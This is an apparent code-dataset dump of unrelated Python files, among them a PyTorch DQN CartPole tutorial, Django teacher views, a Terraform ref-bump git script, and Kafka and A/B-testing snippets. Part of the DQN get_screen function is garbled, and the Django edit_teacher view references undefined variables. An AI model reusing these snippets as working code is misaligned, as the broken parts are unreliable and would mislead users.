\nLOOK_SHRINKING_CIRCLE_AREA,\\\nLOOK_DIAMOND_AREA,\\\nLOOK_SHRINKING_DIAMOND_AREA,\\\nDIE_AT_FIXED_SPOT,\\\nDIE_AT_SAFE_SPOT,\\\nDIE_AT_DANGEROUS_SPOT,\\\nDIE_AT_GOAL,\\\nDIE_AFTER_N,\\\nDIE_ONE_IN = range(56)\n\nMETHOD_RANDOM,\\\nMETHOD_CYCLE,\\\nMETHOD_PICK = range(3)\n\nQUERY_SAFE_PERCENTAGE,\\\nQUERY_DANGEROUS_PERCENTAGE,\\\nQUERY_RANDOM_SAFE_SPOT,\\\nQUERY_RANDOM_DANGEROUS_SPOT,\\\nQUERY_LAST_DEATH_SPOT,\\\nQUERY_LAST_MORPH_SPOT = range(6)\n\nERROR_NONE,\\\nERROR_CANCEL,\\\nERROR_NO_DEATH,\\\nERROR_NO_MEM = range(4)\n\nclass Butterfly(object):\n\n def __init__(self, *instincts, **config):\n self._instincts = []\n self._config = _bf_config()\n self.set_instincts(instincts)\n self.set_opts(**config)\n\n def set_instincts(self, instincts):\n for i in instincts:\n if len(i) == 1:\n self.add_instinct(i[0])\n else:\n self.add_instinct(i[0], i[1])\n\n def add_instinct(self, action, args=[]):\n instinct = _bf_instinct(action, (c_int * NARGS)(*args))\n self._instincts.append(instinct)\n\n def clr_instincts(self):\n self._instincts = []\n\n def set_opts(self, **kwargs):\n for k, v in kwargs.items():\n setattr(self._config, k, v)\n\nclass Farm(object):\n\n def __init__(self, width, height, spots=None, seed=None):\n self._farm = _bf_farm()\n spots = spots or [0 for x in xrange(width * height)]\n self._farm.spots = (c_int * (width * height))(*spots)\n self._farm.width = width\n self._farm.height = height\n self._farm.seed = seed or 0\n self._farm.last_dangerous = 0\n self._farm.is_init = 0\n\n def last_dangerous(self, opt=None):\n if not opt:\n return self._farm.last_dangerous\n self._farm.last_dangerous = opt\n\n def max_cancels(self, opt=None):\n if not opt:\n return self._farm.max_cancels\n self._farm.max_cancels = opt\n\n def spawn_1(self, bfs, commit=False):\n if not isinstance(bfs, list):\n bfs = [bfs]\n for bf in bfs:\n length = len(bf._instincts)\n if length == 0:\n continue\n instincts = (_bf_instinct * length)(*bf._instincts)\n ret = _library.bf_spawn(self._farm, instincts, length, bf._config)\n # an error means everything fails until commit.\n if ret != ERROR_NONE:\n self.commit()\n return ret\n if commit:\n self.commit()\n return ERROR_NONE\n\n def spawn(self, bfs, ntimes=1, commit=False):\n if not isinstance(bfs, list):\n bfs = [bfs]\n ret = None\n for i in xrange(ntimes):\n ret = self.spawn_1(bfs, commit)\n return ret\n\n def commit(self):\n _library.bf_commit(self._farm)\n\n def random(self):\n return _library.bf_random(self._farm)\n\n def query(self, what):\n ret = (c_int * MAX_QUERY_RET)()\n _library.bf_query(self._farm, what, ret)\n return ret\n\n def cleanup(self):\n _library.bf_cleanup(self._farm)\n\n def width(self):\n return self._farm.width\n\n def height(self):\n return self._farm.height\n\n def seed(self):\n return self._farm.seed\n\n def spot_at(self, x, y):\n return self._farm.spots[y * self._farm.width + x]\n\n def safe_percentage(self):\n p = self.query(QUERY_SAFE_PERCENTAGE)\n return p[0] / 100.\n\n def dangerous_percentage(self):\n p = self.query(QUERY_DANGEROUS_PERCENTAGE)\n return p[0] / 100.\n\n def random_safe_spot(self):\n p = self.query(QUERY_RANDOM_SAFE_SPOT)\n return p[0], p[1]\n\n def random_dangerous_spot(self):\n p = self.query(QUERY_RANDOM_DANGEROUS_SPOT)\n return p[0], p[1]\n\n def last_death_spot(self):\n p = self.query(QUERY_LAST_DEATH_SPOT)\n return p[0], p[1]\n\n def last_morph_spot(self):\n p = self.query(QUERY_LAST_MORPH_SPOT)\n return p[0], p[1]\n\ndef random_1x1(tile):\n return Butterfly(*[\n [MORPH_AT_RANDOM_SPOT],\n [LOOK_1_AREA, [tile]],\n [DIE_AFTER_N, [1]]\n ])\n\ndef random_nxm(tile, n, m):\n return Butterfly(*[\n [MORPH_AT_RANDOM_SPOT],\n [LOOK_RECT_AREA, [tile, n, m]],\n [DIE_AFTER_N, [1]]\n ])\n","sub_path":"lib/butterfly.py","file_name":"butterfly.py","file_ext":"py","file_size_in_byte":7672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"457151638","text":"import vaitk\nfrom vaitk import core, gui\n\nfrom . import flags\nimport logging\n\nclass EditAreaEventFilter(core.VObject):\n \"\"\"\n Event filter to detect the use of commandbar initiation\n keys, such as :, / and ?\n \"\"\"\n def __init__(self, command_bar):\n super().__init__()\n self._editor_model = None\n self._command_bar = command_bar\n\n def eventFilter(self, event):\n if not self._hasModel():\n return False\n\n if not isinstance(event, gui.VKeyEvent):\n return False\n\n if self._editor_model.mode != flags.COMMAND_MODE:\n return False\n\n if event.key() == vaitk.Key.Key_Colon:\n self._editor_model.mode = flags.COMMAND_INPUT_MODE\n self._command_bar.setMode(flags.COMMAND_INPUT_MODE)\n self._command_bar.setFocus()\n return True\n\n if event.key() == vaitk.Key.Key_Slash:\n self._editor_model.mode = flags.SEARCH_FORWARD_MODE\n self._command_bar.setMode(flags.SEARCH_FORWARD_MODE)\n self._command_bar.setFocus()\n return True\n\n if event.key() == vaitk.Key.Key_Question:\n self._editor_model.mode = flags.SEARCH_BACKWARD_MODE\n self._command_bar.setMode(flags.SEARCH_BACKWARD_MODE)\n self._command_bar.setFocus()\n return True\n\n if event.key() == vaitk.Key.Key_N and event.modifiers() & vaitk.KeyModifier.ControlModifier:\n self._buffer_list.selectNext()\n return True\n\n if event.key() == vaitk.Key.Key_P and event.modifiers() & vaitk.KeyModifier.ControlModifier:\n self._buffer_list.selectPrev()\n return True\n\n return False\n\n def setModels(self, editor_model, buffer_list):\n self._editor_model = editor_model\n self._buffer_list = buffer_list\n\n # Private\n\n def _hasModel(self):\n return self._editor_model is not None and self._buffer_list is not None\n\n\n","sub_path":"vai/EditAreaEventFilter.py","file_name":"EditAreaEventFilter.py","file_ext":"py","file_size_in_byte":1961,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"362776919","text":"# -*- coding: utf-8 -*-\n\"\"\"\n#############pytorch强化学习DQN 之Qlearning############\nCartpole模型说明:\n#观察值:Observation,观察值包含均布的随机值噪声+-0.5\n0:小车位置 -2.4~2.4\n1:小车速度 -Inf~Inf\n2:摆角度 -41.8~41.8\n3:摆角速度 -Inf~Inf\n#行为:Action\n0: 小车向左\n1: 小车向右\n#仿真结束条件:\n1.摆的角度不在+-12°\n2.小车的单位不在+-2.4\n3.episode 长度大于200\n关于本例中state,action,next_state,reward\nstate:为当前图片-上步的图片,差值可以考虑到速度\naction:shape=(1,1)的tensor,取值时需要action[0][0]\nnext_state:下步的状态\nreward:默认的reward都是1,停止也是1\n\"\"\"\n\nimport math\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport random\nfrom PIL import Image\nfrom collections import namedtuple\nfrom itertools import count\n\nimport gym\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport torchvision.transforms as T\nfrom torch.autograd import Variable\n\n# 创建倒立摆的环境,unwrapped可以获得环境内部参数,更方便进行深层次的操作\n# 如果上传代码到openai,必须去除这个函数,防作弊\nenv = gym.make('CartPole-v0').unwrapped\nis_ipython = 'inline' in matplotlib.get_backend()\nif is_ipython:\n from IPython import display\n\nplt.ion() # 开启交互模式,该模式下可显示多个图片(非阻塞),但只有调用plt.show()才会显示图片\n\n# if gpu is to be used\nuse_cuda = torch.cuda.is_available()\nFloatTensor = torch.cuda.FloatTensor if use_cuda else torch.FloatTensor\nLongTensor = torch.cuda.LongTensor if use_cuda else torch.LongTensor\nByteTensor = torch.cuda.ByteTensor if use_cuda else torch.ByteTensor\nTensor = FloatTensor\n\n######################################################################\n# Replay Memory\n# -------------\n#\n# We'll be using experience replay memory for training our DQN. It stores\n# the transitions that the agent observes, allowing us to reuse this data\n# later. By sampling from it randomly, the transitions that build up a\n# batch are decorrelated. It has been shown that this greatly stabilizes\n# and improves the DQN training procedure.\n#\n# For this, we're going to need two classses:\n#\n# - ``Transition`` - a named tuple representing a single transition in\n# our environment\n# - ``ReplayMemory`` - a cyclic buffer of bounded size that holds the\n# transitions observed recently. It also implements a ``.sample()``\n# method for selecting a random batch of transitions for training.\n#\n\n# 当前状态/行为/下个状态/收益\nTransition = namedtuple('Transition',\n ('state', 'action', 'next_state', 'reward'))\n\n\nclass ReplayMemory(object):\n def __init__(self, capacity):\n self.capacity = capacity\n self.memory = []\n self.position = 0\n\n def push(self, *args):\n \"\"\"Saves a transition.\"\"\"\n if len(self.memory) < self.capacity:\n self.memory.append(None)\n self.memory[self.position] = Transition(*args)\n # 超过capacity则循环重头开始覆盖\n self.position = (self.position + 1) % self.capacity\n\n def sample(self, batch_size):\n \"从下步可用状态中随机抽取N个\"\n return random.sample(self.memory, batch_size)\n\n def __len__(self):\n return len(self.memory)\n\n\n######################################################################\n# Now, let's define our model. But first, let quickly recap what a DQN is.\n#\n# DQN algorithm\n# -------------\n#\n# Our environment is deterministic, so all equations presented here are\n# also formulated deterministically for the sake of simplicity. In the\n# reinforcement learning literature, they would also contain expectations\n# over stochastic transitions in the environment.\n#\n# Our aim will be to train a policy that tries to maximize the discounted,\n# cumulative reward\n# :math:`R_{t_0} = \\sum_{t=t_0}^{\\infty} \\gamma^{t - t_0} r_t`, where\n# :math:`R_{t_0}` is also known as the *return*. The discount,\n# :math:`\\gamma`, should be a constant between :math:`0` and :math:`1`\n# that ensures the sum converges. It makes rewards from the uncertain far\n# future less important for our agent than the ones in the near future\n# that it can be fairly confident about.\n#\n# The main idea behind Q-learning is that if we had a function\n# :math:`Q^*: State \\times Action \\rightarrow \\mathbb{R}`, that could tell\n# us what our return would be, if we were to take an action in a given\n# state, then we could easily construct a policy that maximizes our\n# rewards:\n#\n# .. math:: \\pi^*(s) = \\arg\\!\\max_a \\ Q^*(s, a)\n#\n# However, we don't know everything about the world, so we don't have\n# access to :math:`Q^*`. But, since neural networks are universal function\n# approximators, we can simply create one and train it to resemble\n# :math:`Q^*`.\n#\n# For our training update rule, we'll use a fact that every :math:`Q`\n# function for some policy obeys the Bellman equation:\n#\n# .. math:: Q^{\\pi}(s, a) = r + \\gamma Q^{\\pi}(s', \\pi(s'))\n#\n# The difference between the two sides of the equality is known as the\n# temporal difference error, :math:`\\delta`:\n#\n# .. math:: \\delta = Q(s, a) - (r + \\gamma \\max_a Q(s', a))\n#\n# To minimise this error, we will use the `Huber\n# loss `__. The Huber loss acts\n# like the mean squared error when the error is small, but like the mean\n# absolute error when the error is large - this makes it more robust to\n# outliers when the estimates of :math:`Q` are very noisy. We calculate\n# this over a batch of transitions, :math:`B`, sampled from the replay\n# memory:\n#\n# .. math::\n#\n# \\mathcal{L} = \\frac{1}{|B|}\\sum_{(s, a, s', r) \\ \\in \\ B} \\mathcal{L}(\\delta) \n#\n# .. math::\n#\n# \\text{where} \\quad \\mathcal{L}(\\delta) = \\begin{cases}\n# \\frac{1}{2}{\\delta^2} & \\text{for } |\\delta| \\le 1, \\\\\n# |\\delta| - \\frac{1}{2} & \\text{otherwise.}\n# \\end{cases}\n#\n# Q-network\n# ^^^^^^^^^\n#\n# Our model will be a convolutional neural network that takes in the\n# difference between the current and previous screen patches. It has two\n# outputs, representing :math:`Q(s, \\mathrm{left})` and\n# :math:`Q(s, \\mathrm{right})` (where :math:`s` is the input to the\n# network). In effect, the network is trying to predict the *quality* of\n# taking each action given the current input.\n#\n\n\nclass DQN(nn.Module):\n '''输入为state,为2副相邻图像的插值,shape=1,3,40,80\n 输出为行为(0,1)的对应概率,代表左和右,bath_size=1,channel=3\n input=3,output=2\n '''\n\n def __init__(self):\n super(DQN, self).__init__()\n self.conv1 = nn.Conv2d(3, 16, kernel_size=5, stride=2)\n self.bn1 = nn.BatchNorm2d(16)\n self.conv2 = nn.Conv2d(16, 32, kernel_size=5, stride=2)\n self.bn2 = nn.BatchNorm2d(32)\n self.conv3 = nn.Conv2d(32, 32, kernel_size=5, stride=2)\n self.bn3 = nn.BatchNorm2d(32)\n self.head = nn.Linear(448, 2)\n\n def forward(self, x):\n x = F.relu(self.bn1(self.conv1(x)))\n x = F.relu(self.bn2(self.conv2(x)))\n x = F.relu(self.bn3(self.conv3(x)))\n return self.head(x.view(x.size(0), -1))\n\n\n######################################################################\n# Input extraction\n# ^^^^^^^^^^^^^^^^\n#\n# The code below are utilities for extracting and processing rendered\n# images from the environment. It uses the ``torchvision`` package, which\n# makes it easy to compose image transforms. Once you run the cell it will\n# display an example patch that it extracted.\n#\n\n# 转换获得的图片(ndarray)->3*320*160\n# 转换为PIL->缩小尺寸为80x40>转换为Tensor\nresize = T.Compose([T.ToPILImage(),\n T.Resize(40, interpolation=Image.CUBIC),\n T.ToTensor()])\n\n# This is based on the code from gym.\nscreen_width = 600\n\n\n# 获得小车当前state中心的像素位置\ndef get_cart_location():\n # env.x_threshold小车的X单向最大范围\n world_width = env.x_threshold * 2\n # 单个像素对应的距离\n scale = screen_width / world_width\n # state=x,speed_x,a,speed_a,state[0]=当前小车的x位置,起点为左侧边缘\n return int(env.state[0] * scale + screen_width / 2.0) # MIDDLE OF CART\n\n\n# 采集小车当前状态下的图片并裁剪大小为320*160,转换为(1,3,40,80)的Tensor\ndef get_screen():\n # 返回numpy_array,由于ndarray的分布为(row,clolumn,channel),需要转换为(channel,row,clolumn)\n # 对于该图片,由(400,600,3)->(3,400,600),pytorch的格式为CHW\n screen = env.render(mode='rgb_array').transpose((2, 0, 1))\n # 高度方向裁剪,只保留图片高度方向的中间部分,(3,400,600)->(3,160,600)\n screen = screen[:, 160:320]\n view_width = 320 # 视野宽度\n cart_location = get_cart_location()\n # //当0600-160,则mask=(-320,0)\n elif cart_location > (screen_width - view_width // 2):\n # 等价于[-view_width,0]\n slice_range = slice(-view_width, None)\n else:\n ##x为中心宽度为view_width\n slice_range = slice(cart_location - view_width // 2,\n cart_location + view_width // 2)\n # 水平方向裁剪,(3,160,600)->(3,160,320)\n screen = screen[:, :, slice_range]\n # Convert to float, rescare, convert to torch tensor\n # 转换为C内存连续空间变量,并归一化\n screen = np.ascontiguousarray(screen, dtype=np.float32) / 255\n # 转换为torch 的Tensor\n screen = torch.from_numpy(screen)\n # 转换为PIL Image,缩小尺寸,添加bath维度,转换为Tensor,(3,160,320)->(1,3,40,80)\n return resize(screen).unsqueeze(0).type(Tensor)\n\n\n# 重置环境\nenv.reset()\nplt.figure()\n# squeeze降维->permute换位->转换为numpy\nplt.imshow(get_screen().cpu().squeeze(0).permute(1, 2, 0).numpy(),\n interpolation='none')\nplt.title('Example extracted screen')\nplt.show()\n\n######################################################################\n# Training\n# --------\n#\n# Hyperparameters and utilities\n# ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n# This cell instantiates our model and its optimizer, and defines some\n# utilities:\n#\n# - ``Variable`` - this is a simple wrapper around\n# ``torch.autograd.Variable`` that will automatically send the data to54\n# the GPU every time we construct a Variable.\n# - ``select_action`` - will select an action accordingly to an epsilon\n# greedy policy. Simply put, we'll sometimes use our model for choosing\n# the action, and sometimes we'll just sample one uniformly. The\n# probability of choosing a random action will start at ``EPS_START``\n# and will decay exponentially towards ``EPS_END``. ``EPS_DECAY``\n# controls the rate of the decay.\n# - ``plot_durations`` - a helper for plotting the durations of episodes,\n# along with an average over the last 100 episodes (the measure used in\n# the official evaluations). The plot will be underneath the cell\n# containing the main training loop, and will update after every\n# episode.\n#\n\nBATCH_SIZE = 128\nGAMMA = 0.999\nEPS_START = 0.9\nEPS_END = 0.05 # 随机选择的\nEPS_DECAY = 200 # 衰减终止迭代次数\n\nmodel = DQN()\n\nif use_cuda:\n model.cuda()\n\noptimizer = optim.RMSprop(model.parameters())\nmemory = ReplayMemory(10000)\nsteps_done = 0\n\n\n# 前200次eps_threshold较大,因此探索几率较多,随着不断的迭代\n# eps_threshold呈指数衰减,exp(-1)=0.368,exp(-2)=0.135,exp(-5)=0.006\n# 这意味着当steps_done=1000次时,eps_threshold=0.05+exp(-5)=0.00557,即5.57%\n# 的几率进行探索,而其他时刻都只进行开发,state.shape=(1,3,40,80),输出为shape=(1,1)的\n# action,可选值为[[0]]或者[[1]],\ndef select_action(state):\n global steps_done\n # 生成随机数\n sample = random.random()\n # 随机选择下步行为的阈值\n eps_threshold = EPS_END + (EPS_START - EPS_END) * \\\n math.exp(-1. * steps_done / EPS_DECAY)\n steps_done += 1\n # 如果随机数大于阈值(迭代次数增多),则进行开发\n if sample > eps_threshold:\n # 将当前模型输入到model,输出(1,2)的action概率,求出最大概率的index,然后转换为(1,1)的tensor\n # max(1)返回最大值的同时还返回该最大值的位置index,max(1)[1]代表列最大值所在的行的index\n return model(\n Variable(state, volatile=True).type(FloatTensor)).data.max(1)[1].view(1, 1)\n else:\n # 随机探索\n return LongTensor([[random.randrange(2)]])\n\n\n# 每轮仿真的步数,len=num_episodes\nepisode_durations = []\n\n\ndef plot_durations():\n plt.figure(1) # figure id=2,如果存在则返回,不存在则创建\n plt.clf() # 清除图像\n durations_t = torch.FloatTensor(episode_durations) # 转换为tensor,shape=num_episodes\n plt.title('Training...')\n plt.xlabel('Episode')\n plt.ylabel('Duration')\n # 绘制本轮仿真经历了多少步,步数越多算法越好\n plt.plot(durations_t.numpy())\n # 从100轮开始,开始绘制本轮前100轮的平均值(包括本轮)\n if len(durations_t) >= 100:\n # 将tensor在指定维度展开,差分步为1,shape=[(n-100)%step+1,100],然后求每行的均值\n # 例如tensor第1行表示(1,100)轮的迭代次数,第2行表示(2,101)的迭代次数\n means = durations_t.unfold(0, 100, 1).mean(1).view(-1)\n # 默认在rows方向增加,前99轮不计平均值为,默认都为0.0\n means = torch.cat((torch.zeros(99), means))\n plt.plot(means.numpy())\n plt.pause(0.001) # 暂停等待图像更新\n if is_ipython:\n display.clear_output(wait=True)\n display.display(plt.gcf())\n\n\n######################################################################\n# Training loop\n# ^^^^^^^^^^^^^\n#\n# Finally, the code for training our model.\n#\n# Here, you can find an ``optimize_model`` function that performs a\n# single step of the optimization. It first samples a batch, concatenates\n# all the tensors into a single one, computes :math:`Q(s_t, a_t)` and\n# :math:`V(s_{t+1}) = \\max_a Q(s_{t+1}, a)`, and combines them into our\n# loss. By defition we set :math:`V(s) = 0` if :math:`s` is a terminal\n# state.\n\n\nlast_sync = 0\n\n\n#此处loss求法有讲究\n#1.Q_a_st1=net(s_t1)\n#2.Q_a_st2=net(s_t_next),s_t_next是已经保存好的下一步的state\n#3.Q_expert=R(s_t_next)*gama+max(Q_a_st2)\n#3.loss=smooth_l1_loss(Q_a_st1,Q_expert)\ndef optimize_model():\n '''优化Qtable'''\n global last_sync\n # 如果memory中存的对象小于1个BATCH_SIZE,则退出\n if len(memory) < BATCH_SIZE:\n return\n # 从memory随机选择N个转换\n transitions = memory.sample(BATCH_SIZE)\n # Transpose the batch (see http://stackoverflow.com/a/19343/3343043 for\n # detailed explanation).\n # 将BATCH_SIZE个Transition转换为1个Transition\n # bach的每个参数都为128的元组\n batch = Transition(*zip(*transitions))\n\n # 计算当前Batch中的每个转换的下步状态部不为None的Index(1,0,1,...)\n non_final_mask = ByteTensor(tuple(map(lambda s: s is not None,\n batch.next_state)))\n\n # We don't want to backprop through the expected action values and volatile\n # will save us on temporarily changing the model parameters'\n # requires_grad to False!\n # 计算当前Batch中的每个转换的下步状态中非None的值,转换为n*1的shape的Variable\n non_final_next_states = Variable(torch.cat([s for s in batch.next_state\n if s is not None]), volatile=True)\n # 将state/action/reward转换为Variable\n state_batch = Variable(torch.cat(batch.state))\n action_batch = Variable(torch.cat(batch.action))\n reward_batch = Variable(torch.cat(batch.reward))\n\n # Compute Q(s_t, a) - the model computes Q(s_t), then we select the\n # columns of actions taken\n # 神经网络计算Q(s_t),然后根据对应的ation选取对应的概率\n state_action_values = model(state_batch).gather(1, action_batch)\n\n # Compute V(s_{t+1}) for all next states.\n\n next_state_values = Variable(torch.zeros(BATCH_SIZE).type(Tensor))\n\n # 神经网络计算Q(s_t+1),下步状态(非None)的输出的行为(0,1)的最大概率\n next_state_values[non_final_mask] = model(non_final_next_states).max(1)[0]\n # Now, we don't want to mess up the loss with a volatile flag, so let's\n # clear it. After this, we'll just end up with a Variable that has\n # requires_grad=False\n next_state_values.volatile = False\n\n # 期望的Q值,Q=Q(s',t')*GAMMA+reward\n # 等于当前(状态,行为)的reward+下步(状态,行为)的最大Q值*GAMMA\n expected_state_action_values = (next_state_values * GAMMA) + reward_batch\n\n # 计算标准差为1的Huber loss,该方法对离群点不敏感,比square loss更具备鲁棒性\n loss = F.smooth_l1_loss(state_action_values, expected_state_action_values)\n\n # Optimize the model\n optimizer.zero_grad()\n loss.backward()\n for param in model.parameters():\n # 限制参数范围上下限为(-1,1)\n param.grad.data.clamp_(-1, 1)\n optimizer.step()\n\n\n######################################################################\n#\n# Below, you can find the main training loop. At the beginning we reset\n# the environment and initialize the ``state`` variable. Then, we sample\n# an action, execute it, observe the next screen and the reward (always\n# 1), and optimize our model once. When the episode ends (our model\n# fails), we restart the loop.\n#\n# Below, `num_episodes` is set small. You should download\n# the notebook and run lot more epsiodes.\n\nnum_episodes = 10000\n# 仿真100轮\nfor i_episode in range(num_episodes):\n # 每轮开始先初始化仿真环境\n env.reset()\n last_screen = get_screen()\n current_screen = get_screen()\n state = current_screen - last_screen\n # 循环直至本次轮仿真结束,即done=true\n # 不用while的原因是count()可以生成迭代次数t,不用t+=1\n for t in count():\n # 选择action\n action = select_action(state)\n # env执行action,action=[[0]]或者[[1]]\n status, reward, done, _ = env.step(action[0, 0])\n x, vel_x, a, vel_a = status\n r1 = (env.x_threshold - abs(x)) / env.x_threshold - 0.8\n r2 = (env.theta_threshold_radians - abs(a)) / env.theta_threshold_radians - 0.5\n reward = r1 + r2\n # 将reward转换为tensor,shape=(1)\n reward = Tensor([reward])\n\n # 上步采集和当前采集的图像\n last_screen = current_screen\n current_screen = get_screen()\n # 如果仿真没有结束,下步的状态等于(当前状态-上步状态)\n if not done:\n next_state = current_screen - last_screen\n else:\n # 仿真结束,则下步为None\n next_state = None\n\n # 将转换存入memory\n memory.push(state, action, next_state, reward)\n\n # 移动到下一步状态\n state = next_state\n\n # 优化QTable\n optimize_model()\n # 如果本轮仿真结束,同时记录本轮仿真的最终步数\n if done:\n episode_durations.append(t + 1)\n plot_durations()\n break\n\nprint('Complete')\n# 关闭渲染\nenv.render(close=True)\nenv.close()\nplt.ioff() # 关闭交互模式\nplt.show() # 显示图片\n","sub_path":"RL/reinforcement_q_learning.py","file_name":"reinforcement_q_learning.py","file_ext":"py","file_size_in_byte":19467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"109667421","text":"from django.shortcuts import render\nfrom .forms import TeacherForm\nfrom .models import Teachers\nfrom django.http import HttpResponse\n\ndef add_teacher(request):\n if request.method == \"POST\":\n form = TeacherForm(request.POST)\n if form.is_valid():\n form.save()\n else:\n return HttpResponse(\"invalid data\",status=400)\n \n else:\n form = TeacherForm()\n return render(request, \"add_teacher.html\", {\"form\":form})\n\n\n\ndef list_teacher(request):\n teacher = Teachers.objects.all()\n return render(request, \"list_teacher.html\", {\"teacher\":teacher})\n\n\n\ndef teacher_detail(request, pk):\n teacher = Teachers.objects.get(pk=pk)\n return render(request, \"teacher_detail.html\", {\"teacher\":teacher})\n\n\n\ndef edit_teacher(request, pk):\n if request.method == \"POST\":\n form = TeacherForm(request.POST, instance = teacher)\n if form.is_valid():\n form.save()\n return redirect(\"list_teacher\")\n else:\n form = TeacherForm(instance = teachers)\n return render(request, \"edit_teacher.html\", {\"form\":form})\n \n\n\n ","sub_path":"project2/akirachix/teachers/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1117,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"402718033","text":"#!/usr/bin/env python\n\"\"\"\nThis script bumps all the module references in the demo stack to\na given Git commit, then bumps the README and example instance to match.\n\nThis is meant to make it easier to keep the demo working/up-to-date with\nchanges in the storage service.\n\"\"\"\n\nimport os\nimport re\nimport subprocess\nimport sys\n\n\ndef get_file_paths_under(root=\".\"):\n \"\"\"Generates the paths to every file under ``root``.\"\"\"\n if not os.path.isdir(root):\n raise ValueError(f\"Cannot find files under non-existent directory: {root!r}\")\n\n for dirpath, _, filenames in os.walk(root):\n for f in filenames:\n if os.path.isfile(os.path.join(dirpath, f)):\n yield os.path.join(dirpath, f)\n\n\ndef update_commit_id(line, commit_id):\n return re.sub(\n r'source = \"github\\.com/wellcomecollection/storage-service\\.git//(?P[^\\?]+)\\?ref=[a-f0-9]+\"',\n f'source = \"github.com/wellcomecollection/storage-service.git//\\\\g?ref={commit_id}\"',\n line\n )\n\n\ndef update_file(path, commit_id):\n old_lines = list(open(path))\n new_lines = [update_commit_id(line, commit_id) for line in old_lines]\n\n if old_lines != new_lines:\n with open(path, \"w\") as outfile:\n outfile.write(\"\".join(new_lines))\n subprocess.check_call([\"git\", \"add\", path])\n\n\nif __name__ == '__main__':\n try:\n commit_id = sys.argv[1]\n except IndexError:\n sys.exit(f\"Usage: {__file__} \")\n\n for path in get_file_paths_under(\"demo_stack\"):\n if path.endswith(\".tf\"):\n update_file(path, commit_id)\n\n subprocess.check_call([\"git\", \"commit\", \"-m\", f\"Bump module references in the demo stack to {commit_id}\"])\n\n current_commit = subprocess.check_output([\"git\", \"rev-parse\", \"HEAD\"]).strip().decode(\"utf8\")[:7]\n\n for f in (\"README.md\", \"main.tf\"):\n update_file(f, current_commit)\n subprocess.check_call([\"git\", \"add\", f])\n\n subprocess.check_call([\"git\", \"commit\", \"-m\", f\"Bump module references in the demo stack README to {current_commit}\"])\n","sub_path":"demo/terraform/bump_refs.py","file_name":"bump_refs.py","file_ext":"py","file_size_in_byte":2070,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"445242993","text":"#This is a simple python script to track our daily time, all recorded data are stored locally\n#By Renkun Kuang, on Jan 06, 2020\n\nimport time\nimport sys\n\ndef add_a_record():\n localtime = time.localtime(time.time())\n # print (\"本地时间为 :\", localtime)\n print(localtime.tm_year)\n year = localtime.tm_year\n mon = localtime.tm_mon\n mday = localtime.tm_mday\n\n","sub_path":"funpython/pytimer/pytimer.py","file_name":"pytimer.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"264810836","text":"\"\"\"edit date model\n\nRevision ID: 84260a442183\nRevises: 261c739576cd\nCreate Date: 2017-06-01 11:11:33.665682\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '84260a442183'\ndown_revision = '261c739576cd'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('dates', sa.Column('mood', sa.Text(), nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('dates', 'mood')\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/84260a442183_edit_date_model.py","file_name":"84260a442183_edit_date_model.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"240203481","text":"import threading, logging, time\nimport asyncio\nfrom aiokafka import AIOKafkaConsumer, AIOKafkaProducer\nfrom kafka import KafkaConsumer, KafkaProducer\nimport json\n\nclass Producer():\n daemon = True\n\n def run(self):\n producer = KafkaProducer(bootstrap_servers='127.0.0.1:9092')\n\n while True:\n producer.send('greet', 'hello max')\n time.sleep(1)\n\n\n\n\nconsumer = KafkaConsumer('greet', group_id='basis', bootstrap_servers='127.0.0.1:9092')\n\nKafkaConsumer(auto_offset_reset='earliest', enable_auto_commit=False)\nKafkaConsumer(value_deserializer=lambda m: json.loads(m.decode('ascii')))\nKafkaConsumer(consumer_timeout_ms=1000)\n\ndef main():\n tasks = [Producer()]\n\n for t in tasks:\n t.run()\n\n time.sleep(10)\n\n for message in consumer:\n print(message.topic, message.key, message.value)\n\n# ========= RUN TESTS =============================================================\n\nmain()","sub_path":"app/data/cryptofeed/tests/kafka_test.py","file_name":"kafka_test.py","file_ext":"py","file_size_in_byte":934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"627633982","text":"from collections import Counter\n\nfrom django.shortcuts import render\n\ncounter_show = Counter()\ncounter_click = Counter()\n\n\ndef index(request):\n page_from = request.GET.get('from-landing', '')\n if page_from in ('original', 'test'):\n counter_click[page_from] += 1\n return render(request, 'index.html')\n\n\ndef landing(request):\n land_type = request.GET.get('ab-test-arg', 'original')\n if land_type not in ('original', 'test'):\n land_type = 'original'\n counter_show[land_type] += 1\n if land_type == 'original':\n return render(request, 'landing.html')\n elif land_type == 'test':\n return render(request, 'landing_alternate.html')\n\n\ndef stats(request):\n test_conv = 0\n orig_conv = 0\n if counter_show['test'] != 0:\n test_conv = round(counter_click['test'] / counter_show['test'], 2)\n if counter_show['original'] != 0:\n orig_conv = round(counter_click['original'] / counter_show['original'], 2)\n return render(request, 'stats.html', context={\n 'test_conversion': test_conv,\n 'original_conversion': orig_conv,\n })\n","sub_path":"request-handling/landing/app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"210265543","text":"#coding:utf-8\nfrom time import sleep\n\nfrom redis import Redis\nfrom scrapy import log\nfrom 